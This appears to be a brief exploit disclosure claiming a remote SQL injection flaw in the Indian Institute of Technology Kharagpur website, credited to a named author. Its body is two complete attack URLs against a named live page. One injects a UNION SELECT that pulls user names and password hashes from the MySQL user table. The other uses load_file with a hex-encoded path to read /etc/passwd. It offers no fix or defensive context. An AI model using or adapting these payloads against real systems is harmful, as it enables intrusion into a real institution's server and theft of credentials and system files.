The Indian Institute of Technology in Kharagpur suffers from a remote SQL injection vulnerability.
65ffaa8d6376c8517275ac697f1ece253189ea0d2a840a1566d48af4b78ef51c
-----------------------------------------------------------------------------------------------
[+] Indian Institute of Technology, Kharagpur suffers from a remote SQL
injection vulnerability
[+] Author: Rohit Bansal
---------------------------------------------------------------------------------------
http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert(concat(user,0x3a,password)%20using%20latin1)%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--<http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert%28concat%28user,0x3a,password%29%20using%20latin1%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+-->
http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20load_file(0x2F6574632F706173737764)%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--<http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20load_file%280x2F6574632F706173737764%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+-->
---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec
---------------------------------------------------------------------------------------